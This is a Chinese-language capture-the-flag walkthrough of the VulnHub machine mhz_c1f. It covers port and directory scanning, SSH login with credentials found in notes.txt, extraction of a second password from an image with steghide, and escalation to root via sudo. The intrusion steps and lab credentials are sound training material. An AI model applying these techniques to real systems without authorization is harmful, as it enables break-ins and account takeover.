目录
信息收集
arp-scan
┌──(root㉿ru)-[~/桌面]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:50:56:2f:dd:99, IPv4: 192.168.9.88
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.9.87 08:00:27:47:aa:76 PCS Systemtechnik GmbHnmap
端口扫描
┌──(root㉿ru)-[~/kali/vulnhub]
└─# nmap -p- 192.168.9.87 --min-rate 10000 -oA ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-07 16:08 CST
Nmap scan report for 192.168.9.87
Host is up (0.0011s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:47:AA:76 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 4.68 seconds
版本信息收集
┌──(root㉿ru)-[~/kali/vulnhub]
└─# nmap -sC -sV -O -p 22,80 192.168.9.87 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-07 16:10 CST
Nmap scan report for 192.168.9.87
Host is up (0.00031s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 38:d9:3f:98:15:9a:cc:3e:7a:44:8d:f9:4d:78:fe:2c (RSA)
| 256 89:4e:38:77:78:a4:c3:6d:dc:39:c4:00:f8:a5:67:ed (ECDSA)
|_ 256 7c:15:b9:18:fc:5c:75:aa:30:96:15:46:08:a9:83:fb (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 08:00:27:47:AA:76 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.07 secondsnikto
┌──(root㉿ru)-[~/kali/vulnhub]
└─# nikto -h 192.168.9.87
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.9.87
+ Target Hostname: 192.168.9.87
+ Target Port: 80
+ Start Time: 2024-04-07 16:15:19 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 5a40b796e2191, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: OPTIONS, HEAD, GET, POST .
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /notes.txt: This might be interesting.
+ 8102 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2024-04-07 16:15:43 (GMT8) (24 seconds)
---------------------------------------------------------------------------
+ 1 host(s) testedWEB
web信息收集
没什么可用信息!dirmap
┌──(root㉿ru)-[~/tools/dirscan/dirmap]
└─# python3 dirmap.py -i http://192.168.9.87/ -lcf
##### # ##### # # ## #####
# # # # # ## ## # # # #
# # # # # # ## # # # # #
# # # ##### # # ###### #####
# # # # # # # # # #
##### # # # # # # # # v1.0
[*] Initialize targets...
[+] Load targets from: http://192.168.9.87/
[+] Set the number of thread: 30
[+] Coroutine mode
[+] Current target: http://192.168.9.87/
[*] Launching auto check 404
[+] Checking with: http://192.168.9.87/mbaknojufociglkfhofsyblelnqhadaommvbtioivj
[*] Use recursive scan: No
[*] Use dict mode
[+] Load dict:/root/tools/dirscan/dirmap/data/dict_mode_dict.txt
[*] Use crawl mode
[200][text/html][3.06kb] http://192.168.9.87/index.html
[200][image/png][3.26kb] http://192.168.9.87//icons/ubuntu-logo.png gobuster
┌──(root㉿ru)-[~/kali/vulnhub]
└─# gobuster dir -u http://192.168.9.87/ -x .php,.txt,.html -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.9.87/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 277]
/index.html (Status: 200) [Size: 10918]
/notes.txt (Status: 200) [Size: 86]
只有remb.txt可以访问,remb2.txt应该被删除了!
除了 first_stage:flagitifyoucan1234 没有可以利用得了!
我们尝试ssh登录
用户名:first_stage
密码:flagitifyoucan1234ssh登录
┌──(root㉿ru)-[~/kali/vulnhub]
└─# ssh first_stage@192.168.9.87
The authenticity of host '192.168.9.87 (192.168.9.87)' can't be established.
ED25519 key fingerprint is SHA256:Jxm0b2xUhxb2N50E9UVsgn5u7Pow8xX6o12kZDGlTlg.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.9.87' (ED25519) to the list of known hosts.
first_stage@192.168.9.87's password:
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-96-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sun Apr 7 10:08:16 UTC 2024
System load: 0.0 Processes: 90
Usage of /: 44.9% of 9.78GB Users logged in: 0
Memory usage: 23% IP address for enp0s3: 192.168.9.87
Swap usage: 0%
=> There are 2 zombie processes.
idi^H^H
* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
just raised the bar for easy, resilient and secure K8s cluster deployment.
https://ubuntu.com/engage/secure-kubernetes-at-the-edge
285 packages can be updated.
218 updates are security updates.
Last login: Fri Apr 24 18:18:07 2020 from 192.168.5.253
$ id
-sh: 1: iid: not found
登录成功!提权
获得初始立足点
$ bash
first_stage@mhz_c1f:~$ id
uid=1001(first_stage) gid=1001(first_stage) groups=1001(first_stage)
first_stage@mhz_c1f:~$ ls
user.txt
first_stage@mhz_c1f:~$ cat user.txt
HEEEEEY , you did it
that's amazing , good job man
so just keep it up and get the root bcz i hate low privileges ;)
#mhz_cyber系统信息收集
first_stage@mhz_c1f:~$ uname -a
Linux mhz_c1f 4.15.0-96-generic #97-Ubuntu SMP Wed Apr 1 03:25:46 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
first_stage@mhz_c1f:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 18.04.4 LTS
Release: 18.04
Codename: bionic
first_stage@mhz_c1f:~$
first_stage@mhz_c1f:~$ ls -al /etc/passwd /etc/shadow
-rw-r--r-- 1 root root 1615 Apr 24 2020 /etc/passwd
-rw-r----- 1 root shadow 1068 Apr 24 2020 /etc/shadow
first_stage@mhz_c1f:~$ cat /etc/passwd | grep "home" | grep -v nologin
mhz_c1f:x:1000:1000:mhz_c1f:/home/mhz_c1f:/bin/bash
first_stage:x:1001:1001::/home/first_stage:/bin/sh
first_stage@mhz_c1f:/home$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/gpasswd
/usr/bin/newuidmap
/usr/bin/newgidmap
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/at
/usr/bin/newgrp
/usr/bin/traceroute6.iputils
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/passwd
/bin/umount
/bin/fusermount
/bin/mount
/bin/ping
/bin/su
/snap/core/16928/bin/mount
/snap/core/16928/bin/ping
/snap/core/16928/bin/ping6
/snap/core/16928/bin/su
/snap/core/16928/bin/umount
/snap/core/16928/usr/bin/chfn
/snap/core/16928/usr/bin/chsh
/snap/core/16928/usr/bin/gpasswd
/snap/core/16928/usr/bin/newgrp
/snap/core/16928/usr/bin/passwd
/snap/core/16928/usr/bin/sudo
/snap/core/16928/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/16928/usr/lib/openssh/ssh-keysign
/snap/core/16928/usr/lib/snapd/snap-confine
/snap/core/16928/usr/sbin/pppd
first_stage@mhz_c1f:/home$ find -writable -type f ! -path '/proc/*' 2>/dev/null
./first_stage/.profile
./first_stage/.bash_logout
./first_stage/.viminfo
./first_stage/.bashrc
./first_stage/.cache/motd.legal-displayed
./first_stage/.ssh/known_hosts
./first_stage/user.txt
first_stage@mhz_c1f:/home$ 横向渗透
在上面得信息收集中,first_stage用户没有sudo权限,另一个用户可能存在sudo权限!
我们大概率需要进行横向渗透才行,但是经过信息收集,除了发现几张图片外,没有任何收获!
我们下载到本地进行分析吧!!
binwalk
┌──(root?ru)-[~/kali/vulnhub]
└─# binwalk *.jpeg
Scan Time: 2024-04-07 18:29:35
Target File: /root/kali/vulnhub/19th century American.jpeg
MD5 Checksum: 5cafa72a6fe50328afaba3de8a8d2926
Signatures: 411
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01
30 0x1E TIFF image data, little-endian offset of first image directory: 8
Scan Time: 2024-04-07 18:29:35
Target File: /root/kali/vulnhub/Frank McCarthy.jpeg
MD5 Checksum: 764d621ded4a62d04137349d0947610d
Signatures: 411
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01
30 0x1E TIFF image data, big-endian, offset of first image directory: 8
4704 0x1260 Copyright string: "Copyright (c) 1998 Hewlett-Packard Company"
Scan Time: 2024-04-07 18:29:36
Target File: /root/kali/vulnhub/Russian beauty.jpeg
MD5 Checksum: fded779eef067f984aea9ecb68a3deac
Signatures: 411
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.02
Scan Time: 2024-04-07 18:29:36
Target File: /root/kali/vulnhub/spinning the wool.jpeg
MD5 Checksum: 44d2017fcafaa9ed3c30a0224473eda7
Signatures: 411
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01使用binwalk、exiftool都没有看到可疑点!steghide
┌──(root㉿ru)-[~/kali/vulnhub]
└─# steghide info 19th\ century\ American.jpeg
"19th century American.jpeg":
format: jpeg
capacity: 27.1 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
steghide: could not extract any data with that passphrase!
使用info参数查看是否存在内嵌数据!发现 'spinning the wool.jpeg' 存在内嵌数据!
我们使用 extract 参数提取出来!
┌──(root㉿ru)-[~/kali/vulnhub]
└─# steghide extract -sf spinning\ the\ wool.jpeg
Enter passphrase:
wrote extracted data to "remb2.txt".
┌──(root㉿ru)-[~/kali/vulnhub]
└─# cat remb2.txt
ooh , i know should delete this , but i cant' remember it
screw me
mhz_c1f:1@ec1f提权
first_stage@mhz_c1f:/home$ su mhz_c1f
Password:
mhz_c1f@mhz_c1f:/home$ id
uid=1000(mhz_c1f) gid=1000(mhz_c1f) groups=1000(mhz_c1f),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
mhz_c1f@mhz_c1f:/home$
mhz_c1f@mhz_c1f:/home$ sudo -l
Matching Defaults entries for mhz_c1f on mhz_c1f:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User mhz_c1f may run the following commands on mhz_c1f:
(ALL : ALL) ALL
mhz_c1f@mhz_c1f:/home$
mhz_c1f@mhz_c1f:/home$ sudo /bin/bash
root@mhz_c1f:/home# id
uid=0(root) gid=0(root) groups=0(root)
root@mhz_c1f:/home#